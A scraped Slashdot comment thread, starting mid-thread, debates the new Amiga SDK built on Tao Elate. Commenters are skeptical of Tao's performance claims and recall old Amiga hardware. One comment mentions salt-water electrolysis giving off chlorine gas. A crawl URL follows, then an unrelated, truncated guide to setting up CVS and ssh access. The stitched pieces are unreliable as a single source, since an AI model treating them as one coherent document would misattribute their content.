faster). Re:Amiga? (Score:1) Anyway, my suggestion would be add salt (And keep ventolated. Chlorine gas will come off the other electrode. Nasty stuff) A model railway or a scalextric controller is pretty good for getting a decent whack of fairly safe DC power. Worked for me anyway. As long as you only want small quantities. This will fill a test tube quite quickly. Re:TAO Similarities (Score:1) I got the information from a nice in-depth article in Acorn User magazine. A hint for anyone wanting to keep things top secret: don't publish the details in newsstand magazines, even Acorn ones. It just doesn't have the desired effect. Tao have always been full of hype, and as far as I can tell have never yet delivered. If they've finally got round to producing something all these years on, then great. But I gave up holding my breath at about the same time as I did for the rebirth of the real Amiga. As for the claims about the performance of their JVM technology elsewhere in this thread, I'm sceptical. Given that Sun's produces close-to-native performance for many tasks (and if you work really hard at cheating even faster than native under Hotspot), anything that's consistently 22x faster would be a nice toy indeed. In short, don't believe the hype, and in particular don't believe the hype from a company that's been 'just about to release' for half a decade. Re:pot calling the kettle black (Score:1) Re:It's DEAD. Spell it with me D E A D. (Score:1) But please people, lighten up and let us have our fun. If I want to spend ~$100 on an SDK for a dead platform It's my money. I don't need/want people to tell me that the platform is dead. Re:Only RH6.1? (Score:1) Linux should consider this (Score:1) Re:A lot of us have been following it closely.... (Score:1) There's an interesting, parallel syndrome that has started affecting a small subsection of modern geeks: BeOS Persecution Complex. Interestingly enough, the Inquisition doesn't appear to be the Microsoft users, who have traditionally been the most vicious in their ignorance, but some of the more rabid Linux devotees, now using many of the same attacks and barbs that Microsoft fans used to attack Linux: No Apps, No Hardware, Weird APIs, I don't like the Browser. Re:OK let's come to an understanding right now. (Score:1) That's pretty cool if you ask me, and it definitely indicates some similarity Re:Ignorant fool! (Score:1) >to buy an additional soundcard to get 16 bit... That may be so, but I can`t tell any difference between the Amiga sound and my SB16 - and maybe it`s just me, but the Amiga often sounds better (maybe it`s just all the superb musicians we had / have ?) Now is the best time (Score:1) People are once again realizing that there is more than one OS option. Linux and Mac dented the Win32 armor and now others like BeOS and Amiga can take advantage. It's also apparent that specialized OS's are better than General Purpose OS's on some things. Linux is better as a server than Win32, BeOS is better at multimedia than BSD, etc etc. The time is finally right for the Amiga to be able to ge noticed and taken seriously. D Re:The Amiga sucked in it's day. Thank God it's de (Score:1) The keyboard again depended on which model you bought. I would personally disagree with the applications; it never had many Microsoft applications, but that was more down to the fact that the two that did turn up on the Amiga (Amiga Basic and Word 1) were slow and buggy. I'll also admit that the applications aren't up to scratch with current ones, but they weren't bad at the time! Multi-user, I'll admit, the Amiga doesn't really support. It can be added, but it isn't easy to. On the other hand, it was never designed to, and how many people really use multi-user on their home systems? Networking was always an option, in the same way you can add a networking card to a PC. What exactly do you mean no security? Are you just repeating the complaint about multi-user? Because you just complained it had no networking, so it can't be security against remote access... Basically, you're doing the equivalent of buying a cheap 286/386/whatever, then complaining it doesn't match a server class system costing several times as much. It was never designed to, it was meant to be cheap! What it was meant to do, it did very well! Re:pot calling the kettle black (Score:1) Secondly, "Mr. Malda" does not equal "Andover.net," so be careful to whom you're addressing your questions. Re:OK let's come to an understanding right now. (Score:1) I'm wondering whether Amiga really are telling the outside world what they are doing well enough. It seems only the "die hards" and the people who hang round them ever know really what's going on. I seriously doubt that it's down to anything like laziness on the majority of Slashdot readers parts - although you can all prove me wrong if you like! Wait one darn minute... (Score:3) Since the GCC compiler is GPL'ed, doesn't that mean that the whole modified compiler is GPL'ed and consequencly open source? now is the worst time... (Score:3) Sadly, I think this is destined to be an "also ran" in the race sheet of history. Re:OK let's come to an understanding right now. (Score:1) Ok, I really was going to post "the Amiga was good for its day but it should die in peace" but you beat me to the punch. I guess I just don't understand WHY I should care about the Amiga. This is an honest question; what advantages do I get over other modern systems? Pretty useless review (Score:2) Re:OK let's come to an understanding right now. (Score:2) The new Amiga OS is built from Tao Elate. It shares 0% legacy with that A500 you may have owned in 1988. It may have a compatibility layer, but so does any Linux box running UAE, and I notice these people don't condemn Linux by the same logic. My point, though, is that the first 30 replies everytime the Amiga is mentioned are from people who are actively trying not to learn these things. Re:Wait one darn minute... (Score:1) John A Description of the SDK (Score:1) Now this is what you people should have read first (Score:1) Re:Amiga? (Score:1) Probably because you see inherent benefit to others in helping with experiments that result purely in a greater understanding of the physical sciences, thus encouraging people to study these phenonema full time, and help develop a greater understanding of the universe. Re:The Amiga sucked in it's day. Thank God it's de (Score:3) My A500 had a hard drive. In fact I had a SCSI hard drive first (a huge 52Mb!) before most of my PC owning friends had heard of SCSI. > no networking The had TCP/IP stacks. Not included as standard though. AmiTCP was a popular one which was based on the BSD stack and was stable and fast. These days, most people using Amigas use Miami. It's a modern TCP/IP stack most features anyone would want such as IP-NAT, automatic SOCKS (a la tsocks) > , no security Okay, you got me! > no decent applications I think some of the apps were/are good. The only remaining use I have for my amiga (my A4000) is on my LAN as a web client, using my Linux box as a proxy. I would say that no single browser available for the Amiga beats netscape on linux, but the variety available (three fairly good browsers: Voyager, IBrowse and AWeb) are pretty good, fast (thats not the browsers though - thats the Amiga's snappy GUI) and usually more stable than netscape so I often find myself using my amiga for a fair amount of web access. I find it unfortunate that I find myself feeling like I have to make an excuse for still using my Amiga occasionally. It's a sorry state of affairs when others resort to spreading mis-information about things they don't understand or don't appreciate. Why can't we stick to up-to-date facts and let people make up their own minds instead? Re:Who or what is osm? (Score:1) Trollus Opensourcus Habitat - Slashdot Very rare. poss. extinct. The osm was until recently a common Troll on Slashdot. It had a distinctive Trolling call sounding like long science fiction parody stories about Natalie portman and open source man. Since osm is only capable of considering breeding with hot young actresses, a new generation of these formidable creatures seems quite unlikely. Re:OK let's come to an understanding right now. (Score:3) (Er, not sure what you mean by "modern system" since this is newer than most everything out there.) It looks like its advantages are similar to Java's: there's the write-once-run-anywhere thing, so that it can infiltrate existing platforms. (e.g. You might have an ancient system like Linux or NT, and end up running Amiga apps on it.) It sounds like the owner is smaller and more focused than Sun, so maybe it will adapt faster and become useful sooner than the standard Java class libraries have. It's hard to tell for sure right now, though. The SDKs are still trickling out, and not everyone has theirs yet. After a few thousand programmers have had them for a few months, there should be a lot more information about whether it rules/sucks. So the real answer to your question is that no one knows yet. Either wait a few months and find out third hand, or order the SDK and see for yourself. --- Better links (Score:1) 1994 Byte intro to Taos [byte.com] Re:Look at the article, it's Elate. (Score:1) Basically, it's a means of distributing closed-source software. But your one build runs on any platform to which the Amiga layer has been ported, now and in the future, and it still gets decent performance. Re:Ignorant fool! (Score:1) -- "I'm surfin the dead zone Re:OK let's come to an understanding right now. (Score:1) Gateway wasn`t doing anything anymore with it, so they sold it. It was rumoured that microsoft putted much pressure on Gateway. Looks interesting! (Score:1) Motorola`s first mobile phone based on Tao technology, [tao-group.com] Review [tao-group.com] Tao becomes Sun authorised JVM, [sun.com] Elate first Heterogenous Multiprocessor OS, [eetimes.com] ARM even states: [armltd.co.uk] "Because of the patented techniques, the intent JTE runs Java applications extremely quickly, more than 30 times faster than competitor's products." Classic/NG Amiga article [stormloader.com] Re:A Description of the SDK (Score:1) Re:Not very impressed, wait for the real thing. (Score:1) You aren't really in X, either, E has a bunch of odd shapes you can deal with. In Windows, look at the Sonique MP3 player. Square windows are old news. > The impressive part is that Amiga`s OS is platform independent that means all those little demonstrations can be done on top of windows, Linux, QNX, BeOS or fully native. And that all code identical!!!!! Ah, like Java! Or maybe more like the recently announced Inferno. Of course, you could also just distribute portable source. Amiga has nothing new here. Amiga was good because it was the hacker's dream system. Now it's a pathetic little company trying to market a pseudo-OS that has nothing new. Re:The Amiga sucked in it's day. Thank God it's de (Score:1) Same Zorro I connector but upside down and on the other side apparently. And its not really a bad hard disk interface, its just that you need a SCSI or IDE controller, which pushes up the cost of the disk drives. Re:OK let's come to an understanding right now. (Score:1) #include <apples-vs-oranges.h> Re:OK let's come to an understanding right now. (Score:2) no more "the amiga is dead and buried" posts and no more "my Amiga 500 multitasks faster than any PC ever will" posts? Re:Wait one darn minute... (Score:3) -- Guges Re:This reviewer isn't a real geek! (Score:2) He'd like to meet up. I'll charge my usual 35%. Mong. * Re:On crack? (Score:1) Mong. * Look at the article, it's Elate. (Score:3) I've seen their environment running on top of QNX, last year. The alpha blending demos were impressive but it was *entirely* at the cost of memory usage. Basically, if you looked at the memory usage, you could compute the amount of double buffering they were using to achieve the effect. (Bear in mind that this is at the cost of hardware acceleration...from what I remember, Tao's Elate is sitting on top of a JavaVM called "intent".) So basically, it's Java without Sun's APIs and without the support of any other large partner. BUT they are looking at HAVi ('Home Audio Video Interoperability') and other emerging standards for what IBM and QNX call "Pervasive Devices". So what I'd like to know is - What's the value-add from Amiga? The name? A higher level API...couldn't just the tao-group do that?
https://slashdot.org/story/00/07/03/0246215/amigas-new-sdk-a-first-glance
CC-MAIN-2017-09
refinedweb
5,626
73.27
Filter::Util::Call - Perl Source Filter Utility Module use Filter::Util::Call ; This module provides you with the framework to write Source Filters in Perl. An alternate interface to Filter::Util::Call is now available. See Filter::Simple for more details. A Perl Source Filter is implemented as a Perl module. The structure of the module can take one of two broadly similar formats. To distinguish between them, the first will be referred to as method filter and the second as closure filter. Here is a skeleton for the method filter:; In fact, the skeleton modules shown above are fully functional Source Filters, albeit fairly useless ones. All they does is filter the source stream without modifying it at all. As you can see both modules have a broadly similar structure. They both make use of the Filter::Util::Call module and both have an import method. The difference between them is that the method filter requires a filter method, whereas the closure filter gets the equivalent of a filter method with the anonymous sub passed to filter_add. To make proper use of the closure filter shown above you need to have a good understanding of the concept of a closure. See perlref for more details on the mechanics of closures.). It will always have at least one parameter automatically passed by Perl - this corresponds to the name of the package. In the example above it will be "MyFilter". Apart from the first parameter, import can accept an optional list of parameters. These can be used to pass parameters to the filter. For example: use MyFilter qw(a b c) ; will result in the @_ array having the following values: @_ [0] => "MyFilter" @_ [1] => "a" @_ [2] => "b" @_ [3] => "c" Before terminating, the import function must explicitly install the filter by calling filter_add. filter_add() The function, filter_add, actually installs the filters at the end of this documents for examples of using context information using both method filters and closure filters. Both the filter method used with a method filter and the anonymous sub used with a closure filter is where the main processing for the filter is done. The big difference between the two types of filter is that the method filter uses the object passed to the method to store any context data, whereas the closure filter uses the lexical variables that are maintained by the closure. Note that the single parameter passed to the method filter, $self, is the same reference that was passed to filter_add blessed into the filter's package. See the example filters later on for details of using $self. Here is a list of the common features of the anonymous sub and the filter() method. Although $_ doesn't actually appear explicitly in the sample filters above, it is implicitly used in a number of places.. The function, filter_del, is used to disable the current filter. It does not affect the running of the filter. All it does is tell Perl not to call filter any more. See "Example 4: Using filter_del" for details." ; Here is a filter which a variation of the Joe2Jim filter. As well as substituting all occurrences of "Joe" to "Jim" it keeps a count of the number of substitutions made in the context object. Once EOF is detected ( $status is zero) the filter will insert an extra line into the source stream. When this extra line is executed it will print a count of the number of substitutions actually made. Note that $status is set to 1 in this case. package Count ; use Filter::Util::Call ; sub filter { my ($self) = @_ ; my ($status) ; if (($status = filter_read()) > 0 ) { s/Joe/Jim/g ; ++ $$self ; } elsif ($$self >= 0) { # EOF $_ = "print q[Made ${$self} substitutions\n]" ; $status = 1 ; $$self = -1 ; } $status ; } sub import { my ($self) = @_ ; my ($count) = 0 ; filter_add(\$count) ; } 1 ; Here is a script which uses it: use Count ; print "Hello Joe\n" ; print "Where is Joe\n" ; Outputs: Hello Jim Where is Jim Made 2 substitutions this: use NewSubst qw(start stop from to) ; Here is the module. package NewSubst ; use Filter::Util::Call ; use Carp ; sub import { my ($self, $start, $stop, $from, $to) = @_ ; my ($found) = 0 ; croak("usage: use Subst qw(start stop from to)") unless @_ == 5 ; filter_add( sub { my ($status) ; if (($status = filter_read()) > 0) { $found = 1 if $found == 0 and /$start/ ; if ($found) { s/$from/$to/ ; filter_del() if /$stop/ ; } } $status ; } ) } 1 ;
http://search.cpan.org/~pmqs/Filter-1.34/Call/Call.pm
crawl-002
refinedweb
738
59.94
Python is one of the best coding languages that a developer should learn to boot his or her career. There are many big sites such as Instagram, Netflix, Uber, Pinterest, and Dropbox, which have been created using python programming language. In this case, skilled Python programmers are in high demand, not only because of the popularity of the language but mostly because it has grown to become a solution to many different problems in the software development world. Python has been used in various developments, such as web applications, machine learning, and data science. As a Python fan, I believe that there are certain essential concepts or facts that every Python developer should know. All these were important were necessary concepts within the period I learned using Python as my main programming language. One needs to be familiar with sites such as the official Python website, Python 2 and 3 documentations, and stack flow. In this article, I will discuss the 12 Things Every Python Developer Should Know. The Different Versions of Python Programming Platforms Although this is not a programming characteristic, it still remains to be crucial to understand the latest versions of Python so that everybody is familiar with the programming language. Python programming language versions are usually numbered as ABC, whereby the three letters epitomize the significant changes that the programming language has encountered. For example, changing from 2.7.4 to 2.7.5 shows that Python made some minor bug fixes to the platform, but going from Python 2 to Python 3 shows a major change took place between the two versions. For you to confirm your version of python program, you can use the statement: import sys print ("My version Number: {}".format(sys.version)) The Python Shell The python shell comes auto-installed in the platform, and it can be executed by typing the command python in the command line (in the Windows OS). This will provide the default version, copyright notice, and r-angles >>> that ask for input. If your computer contains multiple versions of Python, then you will have to add in the python3.3 version number to get the correct version. Python shell allows a user to test some simple commands to detect whether there is a logical or syntax error, thus help avoid consuming much time or memory. Understand the Python Frameworks and the Object Relational Mapper (ORM) Libraries Having a clear understanding of the Python frameworks is very important, but, that does not mean that one has to know all of them. Based on the project that you are trying to execute, you will be required to know the most important ones for that project, but the most popular ones that are used often are CherryPy, Flask, and Django. Moreover, one needs to understand how to connect and use applications through the ORM, such as the Django ORM and SQLAlchemy. This makes it easier, efficient, and faster compared to writing an SQL. Understand the Difference between the Front-End and Back-End Technologies The. It Is Essential to Know How to Use the 'sys' and 'os.' These modules are useful to a Python developer since they provide generality and consistency. The sys allows the developer to use the command line inputs to the program, to avoid going back to the text-editor or amend the program before re-executing. Modifying the inputs on the command line is faster and more efficient compared to retyping the variables in the text editor. This can be done using the sys.argv, which will take in the inputs from the command line. In addition, one can also ensure that the user inputs the accurate parameters. Other than speed, the command line arguments can be employed as part of a process that automates the script repeatedly. List Comprehension Exemplifies the Simplicity and Beauty of Python Python 2.7.5 documentation offers a vivid description of how to list comprehension is important to a developer. A list display produces a new list object since the contents are usually specified either as list comprehension or a list of expressions. Whenever a programmer uses a comma-separated list of expressions, the elements are usually evaluated from left to right and then arranged in that order within the list object. Whenever a list comprehension is used, it contains a single expression that is accompanied by at least one for clause and zero or more for or if clauses. In such a case, the new list elements will be those that will be produced by bearing in mind that each of the if or if clauses a block, nested from left to the right side, and assessing the expression to come up with a list element whenever the innermost block is reached. list2 = [(x, x**2, y) for x in range(5) for y in range(3) if x != 2] print(list2) '''(3) if x != 2] ''' Just as the Python 2.7.5 documentation states, one can create a nested list via list comprehension, and it is mainly significant whenever a developer needs to initiate a matrix or a table. Classes and Functions Definition The def makes function definition in Python to be easier. For example: def count_zeros(string): total = 0 for c in string: if c == "0": total += 1 return total # 3 print (count_zeros ('00102')) Moreover, the recursive functions are also not complicated, and they have a similar character as some object-oriented programming (OOP) languages. Unlike other programming languages such as Java, Python uses few classes, making a developer's expertise in the expertise to be quite limited. The Python 2.7 documentation describes classes as: Python classes provide all the standard featutes of Object Otiented modfied further after creation. File Management Most python scripts use files as their inputs, thus making it important to understand the best way of incorporating the files in your code. In this case, the open keyword serves a great purpose since it is straightforward, and the programmer can loop through the file to analyze it in each line. The alternative is that one can employ readlines () method which helps create a list that comprises of each line in the file, but it is only efficient for smaller files. f = open ('test.txt', 'r') for line in f: f.close() The f.close() helps in freeing up memory that has been occupied by the open file. Basic Memory Management and Copying Structures While making a list in Python since easier, copying is not as straightforward as making a list. In the beginning, I often made separate copies of lists using the simple assignment operators. For example: >>> list1 = [1,2,3,4,5] >>> list2 = list1 >>> list2.append(6) >>> list2 [1, 2, 3, 4, 5, 6] >>> list1 [1, 2, 3, 4, 5, 6] This is a case where making lists that are equal to other lists creates two variable names that point to a similar list in the memory. This applies to any “container'' item such as the dictionary. Since the simple assignment operators do not generate distinct copies, Python contains generic copy operations and a built-in list statement which help is generating more distinct copies. Moreover, slicing can also be used in generating distinct copies. >>> list3 = list(list1) >>> list1 [a, b, c, d, e, f] >>> list3 [a, b, c, d, e, f] >>> list3.remove (3) >>> list3 [a, b, c, d, e, f] >>> list1 [a, b, c, d, e, f] >>> import copy >>> list4 = copy.copy (list1) However, a developer may encounter containers that are within other containers, such as dictionaries containing dictionaries. In this case, using the direct operation will make any changes to one dictionary to be reflected in the larger dictionaries. But, one can solve this using the deep copy operation, which will help in copying every detail. This operation is memory-intensive compared to other copying solutions. Understand the Basic Concepts of Dictionaries and Sets Although lists are the most common types of data structures that are used in Python, one can still use sets and dictionaries. A set is a container that contains items in a similar way as a list, but it only contains distinct elements. If an element x is added to a set that already contains another element x, the set will not change. This makes it advantageous over lists since there will be no need for duplication as required in lists. Moreover, creating a set that is based on the pre-existing list is more manageable since one only inputs the set (list_name). However, one disadvantage of the sets is that they do not support elements indexing, making it lack order. On the other hand, dictionaries are also important data structures that pair up elements together. One can search for values efficiently using a key consistently. Slicing This is a process that involves taking a subset of some data, and it is mostly applied to lists and strings. Slicing is not only limited to just eliminating one element from data. In this case, for programmers to have a better intuition about slicing, they have to understand how the process of indexing works for negative numbers. In the Python documentation, there is an ASCII-style diagram in the Strings section which advocates that the developer should think about Python indices as pointing between data elements. One can employ the Python shell to play around with semi-complicated slicing before using your code. Become a more social person
https://ourcodeworld.com/articles/read/1073/11-things-every-python-developer-should-know
CC-MAIN-2021-39
refinedweb
1,571
60.75
The MEee2Higgs2SM class implements the production of an -channel Higgs in collisions in order to allow easy tests of Higgs decays. More... #include <MEee2Higgs2SM.h> The MEee2Higgs2SM class implements the production of an -channel Higgs in collisions in order to allow easy tests of Higgs decays. It should not be used for physics studies. Definition at line 33 of file MEee2Higgs2SM.h. Make a simple clone of this object. Implements ThePEG::InterfacedBase. Definition at line 135 of file MEee2Higgs2SM 141 of file MEee2Higgs2SM.h. Return a vector of all pointers to Interfaced objects used in this object. Reimplemented from ThePEG::InterfacedBase. matrix element 209 of file MEee2Higgs2SM.h.
https://herwig.hepforge.org/doxygen/classHerwig_1_1MEee2Higgs2SM.html
CC-MAIN-2019-30
refinedweb
108
60.01
On Wed, Mar 13, 2013 at 03:21:11PM -0700, Eric W. Biederman wrote: > > Or replace uids, gids, and projids with kuids, kgids, and kprojids > > In support of user namespaces I have introduced into the kernel kuids, > kgids, and kprojids. The most important characteristic of these ids is > that they are not assignment compatible with uids, gids, and projids > coming from userspace nor are they assignment compatible with uids, gids > or projids stored on disk. This assignment incompatibility makes it > easy to ensure that conversions are introduced at the edge of userspace > and at the interface between on-disk and in-memory data structures. TL;DR: Compared to the last version of this patchset I NACKed, this version increases the per-inode memory footprint by over 100 bytes (i.e. by more than 10%), introduces a double copy of the inode core data into the *hottest path in XFS*, breaks log recovery and fails to address a single NACK I gave for the previous round of the patch set. So, NACK. > Converting xfs is an interesting challenge because of the way xfs > handles it's inode data is very atypical. That you have to tell people that find it strange an unusual immediately indicates that you do not really understand the design and structure of the XFS code. This makes your refusal to listen to feedback from someone who is a subject matter expert all the more difficult to understand. I'll accept that you might forget something mentioned in a review when you post an update, but to ignore a second NACK for the same patch and posting it a third time unchanged is not the best way to make friends and influence people.... And given that you didn't respond to a single review comment I made on the previous version of the patch, well, I have my doubts you are going to respond this time, either. In previous reviews comments I have: - outlined exactly how to provide a minimally invasive patch set that provides full namespace support as a first step in getting XFS to support namespaces. - told you where the ondisk/in-memory boundaries are. - told you that certain IDs are filesystem internal and not subject to namespaces. - asked questions about how filesystems utilities are supposed to deal with namespaces (i.e. userspace impacts of ioctl interface changes). And you haven't responded to any of them. You can't selectively ignore review comments you don't like and then magically expect the reviewers to accept an almost-identical-but-even-more-broken patch set the next time around. > Given the number of ioctls that xfs supports it would be irresponsible to > do anything except insist that kuids, kgids, and kprojids are used in all of > in memory data structures of xfs, as otherwise it becomes trivially easy to > miss a needed conversion with the advent of a new ioctl. Eric, your rhetoric looks so fine and shiny on the wall, but it is utterly worthless. You're telling us that userspace interface are absolutely necessary, but haven't provided any analysis, description or justification so we can judge the impact of the changes or review why you think the only way such changes can be made is your way. Nor have you provided any regression tests to verify that this shiny new namespace support is working as the maker has intended. IOWs, I've got no idea what the impact of changing all the ioctls will be, no way to verify it is correct and you sure as hell aren't going out of your way to make it easy for us to understand the impact, either. Further, I'm pretty sure that you are not even aware of the scope of the issues that namespace awareness raise for some of these XFS ioctls. I've previously asked some questions about behaviours of them, but like most of my other review comments you have ignored those questions. So, before we go changing anything ioctl related, here's some questions you need to answer: - if you run bulkstat, what do we do with inodes that contain a ID owned by a namespace outside the current namespace? - Can we even check the on-disk inode IDs are valid within a specific namespace within the kernel? - open_by_handle() would appear to allow root in any namespace to open any file in the filesystem it has a valid handle for regardless of the namespace. Is this allowable? The output of bulkstat can be fed directly to open_by_handle(), so if bulkstat can return inodes outside the namespace, open-by-handle can open them and we can do invisible IO on them. - Further, we can extract and set attributes directly by handle and, IIRC, that includes security/trusted namespace attributes.... - On the same measure, the handles used by XFS handle interfaces are identical to NFS handles and use the same code for decoding and dentry lookup. So, what do handle restrictions mean for NFS servers? - have you considered that fs/fhandle.c raises many of these same issues? - and seeing xfsdump and xfs_fsr use bulkstat and handles, what do new limitations on these interfaces mean for these utilities? - How does xfs_dump/xfs_restore work if we convert all ids based on the current namespace? e.g. dump in one namespace, restore in another. - How does xfs_dump/xfs_restore work if we *don't* convert all ids (i.e. export the on-disk values)? - How do we document/communicate all these constraints/ behaviours to users who might be completely unaware of them? IOWs, simply converting IDs the ioctls take in or emit is only a small part of the larger question of how they are supposed to behave in namespace containers. These questions need to be answered *in detail* and with *regression tests* before we accept any changes to the ioctl interfaces. Eric, I'm not trying to be difficult here - I'm holding the bar at the same height as it gets held for any significant XFS change that impacts userspace interfaces and behaviour. You don't maintain the XFS code, so you can just walk away once namespaces are "done" and not care that you've left a mess behind. And if you leave a mess, I'm the person who will have to clean it up. I don't want to have to clean up your mess, so I'm going to keep saying no until you can introduce namespace support without making a mess.... -Dave. -- Dave Chinner david@xxxxxxxxxxxxx
http://oss.sgi.com/archives/xfs/2013-03/msg00382.html
CC-MAIN-2015-22
refinedweb
1,088
66.47
I don’t see SaveSettings in RhinoScriptSyntax - is there a way to read/write an .ini file in a similar way in Python? thanks, –jarek I don’t see SaveSettings in RhinoScriptSyntax - is there a way to read/write an .ini file in a similar way in Python? thanks, –jarek Hi Jarek, I’ve been using ConfigParser without issues so far: Let me know if you don’t get it to work, I might have pruned my custom code a little too much import ConfigParser def read_ini_file(filepath): cnfg = ConfigParser.ConfigParser() cnfg.read(filepath) config_dict = {} for section in cnfg.sections(): section_dict = {} options = cnfg.options(section) for option in options: raw_value = cnfg.get(section, option) value = raw_value.decode("utf-8")#optional not essential section_dict[option] = value config_dict[section] = section_dict return config_dict -Willem Thanks Willem! I will give it a shot and try to see if I can also make it write ini files… Ah yes the writing part… I only use it to fetch configuration files so never implemented writing out dictionaries. Actually that’s good - an excuse for me to practice and learn Found this for starters: –jarek
https://discourse.mcneel.com/t/rhinoscript-savesettings-in-python/60372
CC-MAIN-2022-33
refinedweb
188
57.47
Before you can edit and run Python program, you have to Add Interpreter of Python. Start Android Emulator and ASE installed in the previous article, android-scripting: Android Scripting Environment. Press MENU key, and select Add Interpreter. Select Add Interpreter>Python 2.6.2 Press MENU key again, and select Add Script. Select Python 2.6.2. Type the name in the upper box; eg. HelloAndroidPython.py. Type your Python codes in the lower box. Every Python come with the codes: import android droid = android.Android() It's the android module, which is needed in every Python script that interacts with the available Android APIs. Add the code below: droid.makeToast("Hello Android! in Python") Press MENU and click Save & Run. Lets see the result: That's my first Python script in Android:) ------------------------------------------------------------------ For more details of the Python Android API, refer to: PythonAndroidAPI - A description of the Android API available to Python scripts.
http://android-er.blogspot.com/2009/10/python-scripting-in-android.html
CC-MAIN-2019-13
refinedweb
154
68.87
Importing JSON Files Using SQL Server Integration Services By: Nat Sundar | Updated: 2018-03-23 | Comments (2) | Related: More > Integration Services Development Problem. In this tip, I will walkthrough a method to develop a bespoke source to load JSON files using .Net libraries. Basic JSON Format A JSON document must have an object or an array at its root. A JSON object is represented by {} and a JSON array is represented by []. A JSON object can contain another JSON object, a JSON array or string. The JSON property details will be represented as key/value pairs. These key value sets are separated by using a colon “:” and multiple sets are separated using a comma, “,”. Understanding JSON file format The first important step in the process is to understand the format of the JSON. If you are using Notepad++, then the JSON plugins are a good starting point to learn about different JSON formats. You can install the JSON viewer from here and install JSToolAPP from here. The JSON viewer plugin will help you to understand the format of the JSON. The second plugin JSToolApp will help you to format the JSON. In this tip, I will use Notepad++ and these plugins to showcase the example. Sample JSON file Let us assume that we have been supplied a JSON file for orders. This JSON file contain two order details and each order has the details such as order id, customer id and order status. Now let us open this file in the Notepad++ and select the data contents and press Ctrl + Alt+ Shift + J. This will open the JSON viewer and will display the JSON object model. From the JSON viewer, it is evident that the JSON file has an array of objects. Each object represents an order. The object attributes are representing the details of an order. It is observed that the supplied JSON file has an object array within the JSON document. An order has three attributes namely OrderID, CustomerID and OrderStatus. Developing Custom Data Source for JSON File As Microsoft has not supplied the default data source for JSON files, we have to develop a custom/bespoke data source using the script component. In this tip, we will use a script component to build a data source for JSON. Let's add a script component to the data flow task. This script component will read the JSON file and generate the output records with the help of .Net libraries. So, let's configure this script component as a source. As a first step, let's prepare the script component to generate an order dataset. Let's add the order attributes (OrderID, CustomerID & OrderStatus) as output columns with suitable datatypes as mentioned in the image below. Now we are ready to write C# code to read the JSON file. We will be using the function in the .Net library System.Web.Extension to read the JSON file. So, to access the function, we need to add this library as a reference. This can be achieved by selecting the project and by right clicking on Add Reference. In the dialog box, under the .NET tab, look for "System.Web.Extension" library and select it to add it as a reference. Once done, the library will be visible under the reference section. To enable us to use the library, we need to add that in the namespace region as shown in the below image. using System; using System.Data; using Microsoft.SqlServer.Dts.Pipeline.Wrapper; using Microsoft.SqlServer.Dts.Runtime.Wrapper; using System.Collections.Generic; using System.Text; using System.Web.Script.Serialization; using System.IO; using OrderNamespace; Before we start coding on the C#, let us learn some basics. Deserialization Deserialization is a process that helps to transform JSON document to a runtime object. Once the data is available as a runtime object, then it can be parsed by using the .Net libraries. Now we need to read the JSON file content and deserialize it to convert into runtime object. Creating an Order Class We need to create object that can hold the JSON content. So, let's create a class in the C#. This class must have the same structure and properties as the JSON content. A C# class can be created by selecting the project and click Add > Select Class as mentioned in the image below. Type the name of the class as "Order". Now we need to rename the namespace as "OrderNamespace" in the class as mentioned below. Also, we need to create an Order class with three properties (OrderID, CustomerID and OrderStatus). using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace OrderNamespace { public class Order { public int orderid { get; set; } public int customerID { get; set; } public string orderstatus { get; set; } } } The name of the properties has to match the name of the attributes mentioned in the JSON file. Let's assume that the Orders.JSON file is available in the local folder and let's read the file content into a string using File.ReadallText function. The JavaScriptSeralizaer is an object defined in the System.Web.extension assembly that will be used to deserialize the JSON file content. So, create an instance of the object JavaScriptSerializer. The "Deserialize" function in the JavaScriptSerializer object will deserialize and return a runtime object of type "Order". As the Orders JSON file contains an array the Deserialize function will return a List of type "Order". Once the JSON file content has been read, the list can be iterated through using a for each loop as shown in the picture below. As there are two order details in the JSON file, the loop will iterate through two times. In the for each loop the order attributes can be read and provide the output to output buffer.\JSON\Data\Orders.JSON"); JavaScriptSerializer js = new JavaScriptSerializer(); List<Order> orders = js.Deserialize<List<Order>>(jsonFileContent); foreach (Order order in orders) { Output0Buffer.AddRow(); Output0Buffer.OrderID = order.orderid; Output0Buffer.CustomerID = order.customerID; Output0Buffer.OrderStatus = order.orderstatus; } } Let's add a union all after the script component and add a data viewer to see the actual data. Now let's execute the package and you can see there are two order details available in the data pipeline. Summary In this tip, we have learned about importing JSON data using SQL Server Integration Services. Also, we have learned about deserializing JSON content into a JSON runtime object. Next Steps Last Updated: 2018-03-23 About the author View all my tips
https://www.mssqltips.com/sqlservertip/5307/importing-json-files-using-sql-server-integration-services/
CC-MAIN-2020-10
refinedweb
1,087
66.74
We use CVS (Concurrent Version System) to keep track of our sources for various software projects. CVS lets several people work on the same software at the same time, allowing changes to be checked in incrementally. This section is a set of guidelines for how to use our CVS repository, and will probably evolve in time. The main thing to remember is that most mistakes can be undone, but if there's anything you're not sure about feel free to bug the local CVS meister (namely Jeff Lewis <jlewis@galconn.com>). You can access the repository in one of two ways: read-only (Section 2.1.1), or read-write (Section 2.1.2). Read-only access is available to anyone - there's no need to ask us first. With read-only CVS access you can do anything except commit changes to the repository. You can make changes to your local tree, and still use CVS's merge facility to keep your tree up to date, and you can generate patches using 'cvs diff' in order to send to us for inclusion. To get read-only access to the repository: Make sure that cvs is installed on your machine. Set your $CVSROOT environment variable to :pserver:anoncvs@glass.cse.ogi.edu:/cvs Run the command The password is simply cvs. This sets up a file in your home directory called .cvspass, which squirrels away the dummy password, so you only need to do this step once. Now go to Section 2.2. We generally supply read-write access to folk doing serious development on some part of the source tree, when going through us would be a pain. If you're developing some feature, or think you have the time and inclination to fix bugs in our sources, feel free to ask for read-write access. There is a certain amount of responsibility that goes with commit privileges; we are more likely to grant you access if you've demonstrated your competence by sending us patches via mail in the past. To get remote read-write CVS access, you need to do the following steps. Make sure that cvs and ssh are both installed on your machine. Generate a DSA private-key/public-key pair, thus: (ssh-keygen comes with ssh.) Running ssh-keygen -d creates the private and public keys in $HOME/.ssh/id_dsa and $HOME/.ssh/id_dsa.pub respectively (assuming you accept the standard defaults). ssh-keygen -d will only work if you have Version 2 ssh installed; it will fail harmlessly otherwise. If you only have Version 1 you can instead generate an RSA key pair using plain Doing so creates the private and public RSA keys in $HOME/.ssh/identity and $HOME/.ssh/identity.pub respectively. [Deprecated.] Incidentally, you can force a Version 2 ssh to use the Version 1 protocol by creating $HOME/config with the following in it: In both cases, ssh-keygen will ask for a passphrase. The passphrase is a password that protects your private key. In response to the 'Enter 